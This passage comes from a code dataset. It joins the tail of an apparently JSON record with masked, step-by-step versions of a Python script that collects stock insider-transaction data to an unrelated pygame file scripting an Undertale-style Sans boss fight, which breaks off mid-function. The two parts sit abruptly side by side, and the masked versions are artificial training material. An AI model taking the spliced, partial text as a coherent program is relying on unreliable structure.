next_trading = now + timedelta(days=7 - now.weekday())\n tomorrow = datetime(year=next_trading.year, month=\n next_trading.month, day=next_trading.day, hour=16,\n minute=0, second=0)\n return (tomorrow - now).total_seconds()\n elif now.weekday() <= 4 and now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n return 900\n elif self.found == 0 and self.not_found > 0:\n if now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n tomorrow = now + timedelta(days=1)\n tomorrow = datetime(year=tomorrow.year, month=tomorrow.\n month, day=tomorrow.day, hour=16, minute=0, second=0)\n return (tomorrow - now).total_seconds()\n else:\n return 900\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FintelInsiderAcquisition:\n\n def __init__(self, trading_date=None):\n self.task_name = 'FintelInsiderAcquisition'\n self.trading_date = trading_date\n self.symbols = Financial_Symbols.get_all()\n self.finance_db = None\n self._reset_counters()\n\n def _reset_counters(self):\n self.found = 0\n self.not_found = 0\n self.symbols = Financial_Symbols.get_all()\n\n def _log(self, msg, level='info'):\n pass\n\n def get_incomplete_insider_tasks(self):\n if not self.finance_db or not self.trading_date:\n return []\n found = set(list(map(lambda x: x['symbol'], self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(set(self.symbols) - found)\n\n def get_complete_insider_tasks(self):\n symbols = []\n if not self.finance_db or not self.trading_date:\n return symbols\n found = set(map(lambda x: x['symbol'], list(self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(found)\n\n def start(self):\n self._reset_counters()\n if self.trading_date.weekday() > 4:\n self._log('Not running {} on weekend'.format(self.task_name))\n elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:\n self._log('Trading day has not finished yet, {}'.format(self.\n trading_date.time()))\n else:\n self.finance_db = FinanceDB('stock_insider')\n incomplete = self.get_incomplete_insider_tasks()\n insider_transactions = InsiderTransactions(incomplete, batching\n =True)\n for insider_data in insider_transactions.generate():\n documents = []\n for symbol, data in insider_data.items():\n if data:\n data['trading_date'] = str(self.trading_date.date())\n data['symbol'] = symbol\n documents.append(data)\n self.found += 1\n else:\n self.not_found += 1\n if documents:\n self.finance_db.insert_many(documents)\n self._log('{}/{} found/not_found'.format(self.found, self.\n not_found))\n\n def sleep_time(self):\n now = datetime.now()\n if self.found + self.not_found == 
0:\n if now.weekday() > 4:\n next_trading = now + timedelta(days=7 - now.weekday())\n tomorrow = datetime(year=next_trading.year, month=\n next_trading.month, day=next_trading.day, hour=16,\n minute=0, second=0)\n return (tomorrow - now).total_seconds()\n elif now.weekday() <= 4 and now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n return 900\n elif self.found == 0 and self.not_found > 0:\n if now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n tomorrow = now + timedelta(days=1)\n tomorrow = datetime(year=tomorrow.year, month=tomorrow.\n month, day=tomorrow.day, hour=16, minute=0, second=0)\n return (tomorrow - now).total_seconds()\n else:\n return 900\n\n\nif __name__ == '__main__':\n FintelInsiderAcquisition(datetime.now()).start()\n",
"step-4": "from datetime import datetime, timedelta\nfrom request.insider_networking import InsiderTransactions\nfrom db import FinanceDB\nfrom acquisition.symbol.financial_symbols import Financial_Symbols\n\n\nclass FintelInsiderAcquisition:\n\n def __init__(self, trading_date=None):\n self.task_name = 'FintelInsiderAcquisition'\n self.trading_date = trading_date\n self.symbols = Financial_Symbols.get_all()\n self.finance_db = None\n self._reset_counters()\n\n def _reset_counters(self):\n self.found = 0\n self.not_found = 0\n self.symbols = Financial_Symbols.get_all()\n\n def _log(self, msg, level='info'):\n pass\n\n def get_incomplete_insider_tasks(self):\n if not self.finance_db or not self.trading_date:\n return []\n found = set(list(map(lambda x: x['symbol'], self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(set(self.symbols) - found)\n\n def get_complete_insider_tasks(self):\n symbols = []\n if not self.finance_db or not self.trading_date:\n return symbols\n found = set(map(lambda x: x['symbol'], list(self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(found)\n\n def start(self):\n self._reset_counters()\n if self.trading_date.weekday() > 4:\n self._log('Not running {} on weekend'.format(self.task_name))\n elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:\n self._log('Trading day has not finished yet, {}'.format(self.\n trading_date.time()))\n else:\n self.finance_db = FinanceDB('stock_insider')\n incomplete = self.get_incomplete_insider_tasks()\n insider_transactions = InsiderTransactions(incomplete, batching\n =True)\n for insider_data in insider_transactions.generate():\n documents = []\n for symbol, data in insider_data.items():\n if data:\n data['trading_date'] = str(self.trading_date.date())\n data['symbol'] = symbol\n documents.append(data)\n self.found += 1\n else:\n self.not_found += 1\n if documents:\n 
self.finance_db.insert_many(documents)\n self._log('{}/{} found/not_found'.format(self.found, self.\n not_found))\n\n def sleep_time(self):\n now = datetime.now()\n if self.found + self.not_found == 0:\n if now.weekday() > 4:\n next_trading = now + timedelta(days=7 - now.weekday())\n tomorrow = datetime(year=next_trading.year, month=\n next_trading.month, day=next_trading.day, hour=16,\n minute=0, second=0)\n return (tomorrow - now).total_seconds()\n elif now.weekday() <= 4 and now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n return 900\n elif self.found == 0 and self.not_found > 0:\n if now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n tomorrow = now + timedelta(days=1)\n tomorrow = datetime(year=tomorrow.year, month=tomorrow.\n month, day=tomorrow.day, hour=16, minute=0, second=0)\n return (tomorrow - now).total_seconds()\n else:\n return 900\n\n\nif __name__ == '__main__':\n FintelInsiderAcquisition(datetime.now()).start()\n",
"step-5": "from datetime import datetime, timedelta\n\nfrom request.insider_networking import InsiderTransactions\nfrom db import FinanceDB\nfrom acquisition.symbol.financial_symbols import Financial_Symbols\n\nclass FintelInsiderAcquisition():\n\n def __init__(self, trading_date=None):\n self.task_name = 'FintelInsiderAcquisition'\n self.trading_date = trading_date\n self.symbols = Financial_Symbols.get_all()\n self.finance_db = None\n self._reset_counters()\n\n def _reset_counters(self):\n self.found = 0\n self.not_found = 0\n self.symbols = Financial_Symbols.get_all()\n\n def _log(self, msg, level='info'):\n pass\n\n def get_incomplete_insider_tasks(self):\n if not self.finance_db or not self.trading_date:\n return []\n found = set(list(map(lambda x: x['symbol'], self.finance_db.find({\"trading_date\": str(self.trading_date.date())}, {\"symbol\": 1}))))\n return list(set(self.symbols) - found)\n\n def get_complete_insider_tasks(self):\n symbols = []\n if not self.finance_db or not self.trading_date:\n return symbols\n found = set(map(lambda x: x['symbol'], list(self.finance_db.find({\"trading_date\": str(self.trading_date.date())}, {\"symbol\": 1}))))\n return list(found)\n\n def start(self):\n self._reset_counters()\n if self.trading_date.weekday() > 4:\n self._log('Not running {} on weekend'.format(self.task_name))\n elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:\n self._log('Trading day has not finished yet, {}'.format(self.trading_date.time()))\n else:\n self.finance_db = FinanceDB('stock_insider')\n incomplete = self.get_incomplete_insider_tasks()\n insider_transactions = InsiderTransactions(incomplete, batching=True)\n\n for insider_data in insider_transactions.generate():\n documents = []\n for symbol, data in insider_data.items():\n if data:\n data['trading_date'] = str(self.trading_date.date())\n data['symbol'] = symbol\n documents.append(data)\n self.found += 1\n else:\n self.not_found += 1\n if documents:\n 
self.finance_db.insert_many(documents)\n\n self._log('{}/{} found/not_found'.format(self.found, self.not_found))\n # incomplete = len(self.get_incomplete_insider_tasks())\n # complete = len(self.get_complete_insider_tasks())\n # self._log('{}/{} complete/incomplete'.format(complete, incomplete))\n\n def sleep_time(self):\n now = datetime.now()\n if self.found + self.not_found == 0:\n if now.weekday() > 4:\n next_trading = now + timedelta(days=7-now.weekday())\n tomorrow = datetime(year=next_trading.year, month=next_trading.month, day=next_trading.day, hour=16, minute=0, second=0)\n return (tomorrow - now).total_seconds()\n elif now.weekday() <= 4 and now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n return 900\n elif self.found == 0 and self.not_found > 0:\n if now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n tomorrow = now + timedelta(days=1)\n tomorrow = datetime(year=tomorrow.year, month=tomorrow.month, day=tomorrow.day, hour=16, minute=0, second=0)\n return (tomorrow - now).total_seconds()\n else:\n return 900\n\nif __name__ == \"__main__\":\n FintelInsiderAcquisition(datetime.now()).start()",
"step-ids": [
5,
7,
9,
10,
11
]
}
|
[
5,
7,
9,
10,
11
] |
import pygame
import time as time_
import random
import os
from pygame.locals import *
from math import sin, cos, pi
from sys import exit
# ---------------------------
from unzip import *
unzip()
# ---------------------------
from others import *
from gaster_blaster import *
from board import *
from bone import *
from sans import *
from player import *
from functions import *
# ----------------------------------------------------------------
'''初始化'''
# --- Initialisation: window placement, display mode and off-screen buffers ---
os.environ["SDL_VIDEO_WINDOW_POS"] = "100,100"  # pin the SDL window position before pygame.init()
pygame.init()
if FULL_SCREEN:
    display = pygame.display.set_mode((1920, 1080), FULLSCREEN)
else:
    display = pygame.display.set_mode(SCREEN_SIZE)
# Everything is drawn onto `screen` first, then presented on `display`.
screen = pygame.Surface(SCREEN_SIZE).convert_alpha()
mask_surface_blue = pygame.Surface(SCREEN_SIZE).convert_alpha() # mask layer for blue attacks
mask_surface_orange = pygame.Surface(SCREEN_SIZE).convert_alpha() # mask layer for orange attacks
mask_surface_normal = pygame.Surface(SCREEN_SIZE).convert_alpha() # mask layer for normal attacks
pygame.display.set_caption("UPPERTALE") # window title
pygame.display.set_icon(pygame.image.load("res/icon-32.png")) # window icon
fps = pygame.time.Clock() # frame-rate limiter
frames = 60  # target frames per second
# -----------------------------------
'''因为需要修改全局变量
所以不得不写在主文件里的函数'''
def players_turn(text):
    """Queue a hand-over to the player's turn.

    Appends a callback to the global ``attacks`` queue that, when run,
    flips ``is_players_turn`` on, shows *text* in the battle box (reset
    to its first character via ``shown_index``) and wipes every
    remaining projectile list.
    """
    def hand_over_turn():
        global is_players_turn, battle_text, shown_index
        is_players_turn = True
        battle_text = text
        shown_index = 0
        for projectiles in (bones, blasters, boards):
            projectiles.clear()
    attacks.append(hand_over_turn)
def set_turn_time(time):
    """Schedule the current attack to end after *time* frames.

    Registers a delayed ``Task`` whose callback clears the global
    ``stop`` flag, which lets the main loop move on to the next attack.
    """
    def resume(screen):
        global stop
        stop = False
    tasks.append(Task(resume, time))
def add_attack(func):
    """Decorator: register *func* in the global ``attacks`` list (in
    definition order) and return it unchanged."""
    attacks.append(func)
    return func
def shake(screen):
    """Task callback: switch the global screen-shake effect on.

    ``screen`` is accepted to match the Task callback signature; unused.
    """
    global screen_shaking
    screen_shaking = True
def unshake(screen):
    """Task callback: switch the global screen-shake effect off (``screen`` unused)."""
    global screen_shaking
    screen_shaking = False
def set_screen_angle(angle):
    """Set the global rotation angle applied to the whole screen.

    NOTE(review): units are presumably degrees — confirm against the
    render loop that consumes ``screen_angle``.
    """
    global screen_angle
    screen_angle = angle
def start_testing():
    """Debug helper: discard every queued attack."""
    attacks.clear()
# -------------------------------------
'''回合'''
# 吟唱 (intro "chant") — sans' opening line before the first attack
@add_attack
def yinchang_1():
    """Intro step: position the battle box and have sans deliver his
    opening line ("yinchang" 吟唱 ≈ chant/intro)."""
    global BOX_POS, BOX_SIZE
    BOX_POS = [230, 230]
    BOX_SIZE = [170, 160]
    if DEBUG:
        # test area begin
        pass
        # test area end
    sans.say("准备好了?")  # "Ready?"
# 开头杀 ("opening kill") — the surprise attack that opens the fight
@add_attack
def first_round1():
    """Opening attack, part 1: slam the SOUL to the box floor, then raise
    a wall-to-wall row of bones that rise, hold, and sink again.

    The screen shake and slam sound are scheduled to fire at the moment
    of impact.
    """
    set_turn_time(50)
    sans.hand_direction = DOWN
    player.type = BLUE_SOUL
    player.direction = DOWN
    player.falling_speed = 10
    player.falling = True
    # Frames until the SOUL reaches the box floor (falling 10 px/frame).
    # Previously this expression was recomputed for each scheduled task.
    impact_delay = (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10
    tasks.append(Task(shake, impact_delay))
    tasks.append(Task(unshake, impact_delay + 5))
    tasks.append(Task(lambda screen: slam_sound.play(), impact_delay))
    # One bone column every 10 px across the whole box width.
    for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 10):
        # Rise out of the floor for 8 frames...
        bones.append(
            Bone(
                pos=[x, BOX_POS[1] + BOX_SIZE[1] - 7],
                speed=[0, -5],
                direction=UP,
                time1=8,
                time2=40,
                length=1000,
                type_=1
            )
        )
        # ...hold at full height for 200 frames...
        bones.append(
            Bone(
                pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47],
                speed=[0, 0],
                direction=UP,
                time1=200,
                time2=48,
                length=1000,
                type_=1
            )
        )
        # ...then sink back down.
        bones.append(
            Bone(
                pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47],
                speed=[0, 5],
                direction=UP,
                time1=8,
                time2=248,
                length=1000,
                type_=1
            )
        )
@add_attack
def first_round2():
    """Opening attack, part 2: slam the SOUL into the left wall, then grow
    rows of bones out of it that extend, hold, and retract.
    """
    set_turn_time(50)
    sans.hand_direction = LEFT
    player.type = BLUE_SOUL
    player.direction = LEFT
    player.falling_speed = 10
    player.falling = True
    # Frames until the SOUL reaches the left wall (moving 10 px/frame).
    # Previously this expression was recomputed for each scheduled task.
    impact_delay = (player.pos[0] - BOX_POS[0]) // 10
    tasks.append(Task(shake, impact_delay))
    tasks.append(Task(unshake, impact_delay + 5))
    tasks.append(Task(lambda screen: slam_sound.play(), impact_delay))
    # One bone row every 10 px down the full box height.
    # NOTE(review): the 3-element speed's third component presumably drives
    # length growth for type_=2 bones — verify against the Bone class.
    for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):
        # Grow out of the wall for 8 frames...
        bones.append(
            Bone(
                pos=[BOX_POS[0] - 7, y],
                speed=[0, 0, 5],
                direction=LEFT,
                time1=8,
                time2=30,
                length=0,
                type_=2
            )
        )
        # ...hold at length 40 for 150 frames...
        bones.append(
            Bone(
                pos=[BOX_POS[0] - 7, y],
                speed=[0, 0, 0],
                direction=LEFT,
                time1=150,
                time2=38,
                length=40,
                type_=2
            )
        )
        # ...then retract.
        bones.append(
            Bone(
                pos=[BOX_POS[0] - 7, y],
                speed=[0, 0, -5],
                direction=LEFT,
                time1=8,
                time2=188,
                length=40,
                type_=2
            )
        )
@add_attack
def first_round3():
    """Opening attack, part 3: a scrolling corridor of paired bones whose
    gap undulates along a sine wave.

    The SOUL is set back to red (free movement) while bone pairs stream
    across the box, one spawning every 2 frames for 300 frames.
    """
    set_turn_time(450)
    player.type = RED_SOUL
    for delay in range(0, 300, 2):
        wave = sin(delay / 20) * 40  # vertical modulation of this pair
        bones.append(
            Bone(
                pos=BOX_POS,
                length=40 + wave,
                direction=UP,
                speed=[7, 0],
                time1=1000,
                time2=delay,
            )
        )
        bones.append(
            Bone(
                pos=[BOX_POS[0], BOX_POS[1] + 25 + wave + 60],
                length=1000,
                direction=UP,
                speed=[7, 0],
                time1=1000,
                time2=delay,
            )
        )
@add_attack
def first_round4():
    """sans glances aside and comments on the opening barrage."""
    sans.headtype = SANS_LOOK_LEFT
    sans.say("只是第一个回合而已,何必用尽全力?")  # "It's only the first turn — why go all out?"
@add_attack
def first_round5():
    """End the opening sequence: reset sans' expression and start the music."""
    set_turn_time(1)
    sans.headtype = SANS_NORMAL
    pygame.mixer.music.play(-1)  # -1 == loop indefinitely
players_turn("* ...")
@add_attack
def zjj_1():
    """Set up the blaster phase: shrink the battle box and slam the SOUL down."""
    set_turn_time(60)
    global BOX_POS, BOX_SIZE
    BOX_POS = [200, 230]
    BOX_SIZE = [200, 150]
    sans.hand_direction = DOWN
    player.type = BLUE_SOUL
    player.direction = DOWN
    player.falling_speed = 10
    # NOTE(review): unlike first_round1, player.falling is not set to True
    # here — confirm the downward slam is still triggered elsewhere.
    # Frames until the SOUL reaches the box floor; previously this
    # expression was recomputed for each of the three scheduled tasks.
    impact_delay = (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10
    tasks.append(Task(shake, impact_delay))
    tasks.append(Task(unshake, impact_delay + 5))
    tasks.append(Task(lambda screen: slam_sound.play(), impact_delay))
@add_attack
def zjj_2():
    """Blaster volley: ten waves of aimed Gaster Blasters plus sweeping bones.

    Every 100 frames a blaster spawns on a random arc around the SOUL and
    fires back through its position, while bone walls slide in from both
    sides of the box 60 frames into each wave.
    """
    set_turn_time(11 * 100)

    def fire_blaster(screen):
        # Pick an angle in the 240°-300° arc, place the blaster 200 px away
        # along it, and point it back toward the player (angle - 180).
        # NOTE(review): `math` is not imported in this file directly —
        # presumably re-exported by one of the star imports; confirm.
        angle = random.randint(240, 300)
        spawn = [
            player.pos[0] + math.cos(math.radians(angle)) * 200,
            player.pos[1] + math.sin(math.radians(angle)) * 200,
        ]
        blasters.append(GasterBlaster(
            pos=spawn,
            angle=angle - 180,
            time1=10,
            time2=30,
            width=30,
            color=BLUE
        ))

    short_length = BOX_SIZE[1] - 30 - 16
    floor_y = BOX_POS[1] + BOX_SIZE[1] - 10 - 8
    for wave in range(10):
        delay = wave * 100
        tasks.append(Task(fire_blaster, delay))
        # A short bone (type 2) slides in from each side near the top...
        bones.append(Bone(
            pos=[BOX_POS[0] - 20, BOX_POS[1] - 8],
            length=short_length,
            direction=DOWN,
            time1=1000,
            time2=delay + 60,
            speed=[2, 0],
            type_=2
        ))
        bones.append(Bone(
            pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1] - 8],
            length=short_length,
            direction=DOWN,
            time1=1000,
            time2=delay + 60,
            speed=[-2, 0],
            type_=2
        ))
        # ...and a full-length bone (type 1) from each side at floor level.
        bones.append(Bone(
            pos=[BOX_POS[0] - 20, floor_y],
            length=1000,
            direction=DOWN,
            time1=1000,
            time2=delay + 60,
            speed=[2, 0],
            type_=1
        ))
        bones.append(Bone(
            pos=[BOX_POS[0] + BOX_SIZE[0] + 20, floor_y],
            length=1000,
            direction=DOWN,
            time1=1000,
            time2=delay + 60,
            speed=[-2, 0],
            type_=1
        ))
players_turn("* ...")
@add_attack
def blue_bone():
    """Slam the soul down, then send waves of gapped bones across the floor;
    each wave is chased 16 ticks later by a BLUE bone (safe while still)."""
    set_turn_time(700)
    global BOX_POS, BOX_SIZE
    BOX_POS = [150, 250]
    BOX_SIZE = [350, 120]
    sans.hand_direction = DOWN
    player.type = BLUE_SOUL
    player.direction = DOWN
    player.falling_speed = 10
    # Effects timed to the end of the fall (distance / 10 px per tick).
    tasks.append(Task(shake,
        (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
    tasks.append(Task(unshake,
        ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
    tasks.append(Task(lambda screen : slam_sound.play(),
        (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
    for _ in range(10):
        # Top stub + bottom wall moving right at 4 px/tick; the jumpable gap
        # sits between them.
        bones.append(
            Bone(
                pos=[BOX_POS[0], BOX_POS[1] - 8],
                length=BOX_SIZE[1] - 30 - 16,
                direction=DOWN,
                time1=1000,
                time2=_ * 60 + 60,
                speed=[4, 0],
                type_=2
            ))
        bones.append(
            Bone(
                pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - 8],
                length=1000,
                direction=DOWN,
                time1=1000,
                time2=_ * 60 + 60,
                speed=[4, 0],
                type_=1
            ))
        # Full-height blue bone trailing the gap: hold still to pass through.
        bones.append(
            Bone(
                pos=BOX_POS,
                length=1000,
                direction=DOWN,
                time1=1000,
                time2=_ * 60 + 60 + 16,
                speed=[4, 0],
                type_=1,
                color=BLUE
            ))
@add_attack
def orange_bone():
    """Mirror of blue_bone on the ceiling: slam the soul UP, spin the screen,
    and send gapped waves trailed by ORANGE bones (safe while moving).

    Fix: the slam sound was timed with the downward-slam formula
    ``(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10`` although the slam is
    upward; it now uses the same delay as the shake so sound and impact
    coincide.
    """
    def start_spinning(screen):
        global spinning_left
        spinning_left = True
    def stop_spinning(screen):
        global spinning_left
        spinning_left = False
    # Spin the screen 180°, snap the angle, later spin back to 0.
    tasks.append(Task(start_spinning, 0))
    tasks.append(Task(stop_spinning, 180))
    tasks.append(Task(lambda screen:set_screen_angle(180), 181))
    tasks.append(Task(start_spinning, 520))
    tasks.append(Task(stop_spinning, 700))
    tasks.append(Task(lambda screen:set_screen_angle(0), 701))
    set_turn_time(700)
    sans.hand_direction = UP
    player.type = BLUE_SOUL
    player.direction = UP
    player.falling_speed = 10
    # Effects timed to the end of the upward fall (distance / 10 px per tick).
    tasks.append(Task(shake,
        (player.pos[1] - BOX_POS[1]) // 10))
    tasks.append(Task(unshake,
        ((player.pos[1] - BOX_POS[1]) // 10) + 5))
    tasks.append(Task(lambda screen : slam_sound.play(),
        (player.pos[1] - BOX_POS[1]) // 10))
    for _ in range(10):
        # Short ceiling stub + wall below it, moving right at 8 px/tick.
        bones.append(
            Bone(
                pos=[BOX_POS[0], BOX_POS[1] - 8],
                length=10,
                direction=DOWN,
                time1=1000,
                time2=_ * 60 + 60,
                speed=[8, 0],
                type_=2
            ))
        bones.append(
            Bone(
                pos=[BOX_POS[0], BOX_POS[1] + 30 + 16],
                length=1000,
                direction=DOWN,
                time1=1000,
                time2=_ * 60 + 60,
                speed=[8, 0],
                type_=1
            ))
        # Orange bone 8 ticks behind the gap: keep moving to pass through.
        bones.append(
            Bone(
                pos=BOX_POS,
                length=1000,
                direction=DOWN,
                time1=1000,
                time2=_ * 60 + 60 + 8,
                speed=[8, 0],
                type_=1,
                color=ORANGE
            ))
players_turn("* ...")
@add_attack
def bone_gap():
    """Ten 100-tick rounds: a blue vertical spike and an orange horizontal
    spike flash at random positions, then bones converge from both sides so
    the only opening is at the (x, y) intersection of those spikes."""
    set_turn_time(1000)
    global BOX_POS, BOX_SIZE
    BOX_POS = [150, 230]
    BOX_SIZE = [300, 150]
    sans.hand_direction = DOWN
    player.type = BLUE_SOUL
    player.direction = DOWN
    player.falling_speed = 10
    tasks.append(Task(shake,
        (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
    tasks.append(Task(unshake,
        ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
    tasks.append(Task(lambda screen : slam_sound.play(),
        (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
    for _ in range(10):
        # Vertical marker column (blue = safe while still): grow then shrink.
        x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)
        bones.append(Bone(
            pos=[x, BOX_POS[1]],
            time1=10,
            time2=_ * 100,
            speed=[0, 0, BOX_SIZE[1] / 10],
            length=0,
            direction=DOWN,
            color=BLUE
        ))
        bones.append(Bone(
            pos=[x, BOX_POS[1]],
            time1=10,
            time2=_ * 100 + 10,
            speed=[0, 0, -BOX_SIZE[1] / 10],
            length=BOX_SIZE[1],
            direction=DOWN,
            color=BLUE
        ))
        tasks.append(Task(shake,_ * 100 + 10))
        tasks.append(Task(unshake,_ * 100 + 15))
        tasks.append(Task(lambda screen : slam_sound.play(),
            _ * 100 + 15))
        # Horizontal marker row (orange = safe while moving): grow then shrink.
        y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)
        bones.append(Bone(
            pos=[BOX_POS[0], y],
            time1=10,
            time2=_ * 100,
            speed=[0, 0, BOX_SIZE[0] / 10],
            length=0,
            direction=RIGHT,
            color=ORANGE
        ))
        bones.append(Bone(
            pos=[BOX_POS[0], y],
            time1=10,
            time2=_ * 100 + 10,
            speed=[0, 0, -BOX_SIZE[0] / 10],
            length=BOX_SIZE[0],
            direction=RIGHT,
            color=ORANGE
        ))
        # Converging walls: speeds chosen so both pairs meet at (x, y)
        # after 30 ticks, leaving a single gap there.
        bones.append(
            Bone(
                pos=[BOX_POS[0], BOX_POS[1] - 8],
                length=y - BOX_POS[1] - 16,
                direction=DOWN,
                time1=1000,
                time2=_ * 100 + 60,
                speed=[(x - BOX_POS[0]) / 30, 0],
                type_=2
            ))
        bones.append(
            Bone(
                pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],
                length=y - BOX_POS[1] - 16,
                direction=DOWN,
                time1=1000,
                time2=_ * 100 + 60,
                speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],
                type_=2
            ))
        bones.append(
            Bone(
                pos=[BOX_POS[0], y + 8],
                length=1000,
                direction=DOWN,
                time1=1000,
                time2=_ * 100 + 60,
                speed=[(x - BOX_POS[0]) / 30, 0],
                type_=1
            ))
        bones.append(
            Bone(
                pos=[BOX_POS[0] + BOX_SIZE[0], y + 8],
                length=1000,
                direction=DOWN,
                time1=1000,
                time2=_ * 100 + 60,
                speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],
                type_=1
            ))
players_turn("* ...")
@add_attack
def board_1():
    """Setup for the platform (board) phase: widen the box and slam the blue
    soul onto the floor. (Same setup as board_2_1 below.)"""
    set_turn_time(10)
    global BOX_POS, BOX_SIZE
    BOX_POS = [50, 240]
    BOX_SIZE = [500, 140]
    sans.hand_direction = DOWN
    player.type = BLUE_SOUL
    player.direction = DOWN
    player.falling_speed = 10
    # Effects fire when the fall (distance / 10 px per tick) completes.
    tasks.append(Task(shake,
        (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
    tasks.append(Task(unshake,
        ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
    tasks.append(Task(lambda screen : slam_sound.play(),
        (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
@add_attack
def board_2():
    """Platform ride: two blasters rake the floor and ceiling, a moving board
    carries the player over a spiked floor while bones sweep past, and the
    screen is spun twice."""
    set_turn_time(600)
    tasks.append(Task(shake, 70))
    tasks.append(Task(unshake, 75))
    # Horizontal blasters across the bottom and top of the box.
    blasters.append(
        GasterBlaster(
            pos=[10, BOX_POS[1] + BOX_SIZE[1]],
            angle=0,
            time1=10,
            time2=70,
            time3=10,
            width=70
        )
    )
    blasters.append(
        GasterBlaster(
            pos=[10, BOX_POS[1]],
            angle=0,
            time1=10,
            time2=70,
            time3=10,
            width=30
        )
    )
    # Spiked floor (wall from below + stubs from above) appearing at tick 100.
    for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):
        bones.append(
            Bone(
                pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],
                length=1000,
                direction=UP,
                time1=1000,
                time2=100,
                speed=[0, 0],
                type_=1
            )
        )
        bones.append(
            Bone(
                pos=[x, BOX_POS[1] - 8],
                length=5,
                direction=DOWN,
                time1=1000,
                time2=100,
                speed=[0, 0],
                type_=2
            )
        )
    # Rideable board crossing the box left-to-right above the spikes.
    boards.append(
        Board(
            pos=[BOX_POS[0],BOX_POS[1] + BOX_SIZE[1] - 40],
            length=40,
            speed=[1, 0],
            time1=BOX_SIZE[0],
            time2=100,
            direction=UP
        )
    )
    # Waves of bones sweeping right-to-left at board height; must be jumped.
    for _ in range(0, 20, 4):
        bones.append(
            Bone(
                pos=[BOX_POS[0] + BOX_SIZE[0],
                     BOX_POS[1] + BOX_SIZE[1] - 40 - 25],
                length=1000,
                direction=UP,
                time1=BOX_SIZE[0] // 4,
                time2=150 + (_ * 30),
                speed=[-4, 0]
            )
        )
    def start_spinning(screen):
        global spinning_left
        spinning_left = True
    def stop_spinning(screen):
        global spinning_left
        spinning_left = False
    # Two 180-tick spins; angle snapped back to 0 at the end.
    tasks.append(Task(start_spinning, 200))
    tasks.append(Task(stop_spinning, 380))
    tasks.append(Task(start_spinning, 500))
    tasks.append(Task(stop_spinning, 680))
    tasks.append(Task(lambda screen:set_screen_angle(0), 682))
@add_attack
def board_3():
    """Short follow-up: slam the soul LEFT, then fire one blaster straight
    down the left wall the player was just pinned against."""
    set_turn_time(100)
    sans.hand_direction = LEFT
    player.type = BLUE_SOUL
    player.direction = LEFT
    player.falling_speed = 10
    # Effects timed to the leftward fall (distance / 10 px per tick).
    tasks.append(Task(shake,
        (player.pos[0] - BOX_POS[0]) // 10))
    tasks.append(Task(unshake,
        ((player.pos[0] - BOX_POS[0]) // 10) + 5))
    tasks.append(Task(lambda screen : slam_sound.play(),
        (player.pos[0] - BOX_POS[0]) // 10))
    tasks.append(Task(shake, 60))
    tasks.append(Task(unshake, 65))
    # Vertical blaster hugging the left wall.
    blasters.append(
        GasterBlaster(
            pos=[BOX_POS[0], 10],
            angle=90,
            time1=10,
            time2=50,
            time3=0,
            width=50
        )
    )
@add_attack
def board_4():
    """Cleanup after the board phase: remove any leftover bones immediately."""
    set_turn_time(0)
    bones.clear()
players_turn("* ...")
@add_attack
def board_2_1():
    """Setup for the second platform phase — identical to board_1: widen the
    box and slam the blue soul onto the floor."""
    set_turn_time(10)
    global BOX_POS, BOX_SIZE
    BOX_POS = [50, 240]
    BOX_SIZE = [500, 140]
    sans.hand_direction = DOWN
    player.type = BLUE_SOUL
    player.direction = DOWN
    player.falling_speed = 10
    # Effects fire when the fall (distance / 10 px per tick) completes.
